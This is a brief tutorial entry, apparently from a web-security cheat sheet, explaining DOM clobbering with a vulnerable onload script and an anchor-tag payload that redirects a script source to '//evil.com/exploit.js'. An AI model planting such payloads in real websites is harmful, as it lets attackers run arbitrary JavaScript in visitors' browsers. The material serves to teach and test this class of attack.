DOM Cloberring

Basic Exploitation

If the website adds the JavaScript code into the DOM when loading page as below,

window.onload = function() {
    let someObj = window.someObj || {};
    let script = document.createElement('script');
    script.src = someObj.url;
    document.body.appendChild(script);
}

We may manipulate this someObj and override the properties (url here) using anchor elements, then we can execute arbitrary JavaScript code. For example, insert the following code in the comment, search, etc. in the target website.

<a id=someObj><a id=someObj name=url href=//evil.com/exploit.js>

References

• DOM Clobbering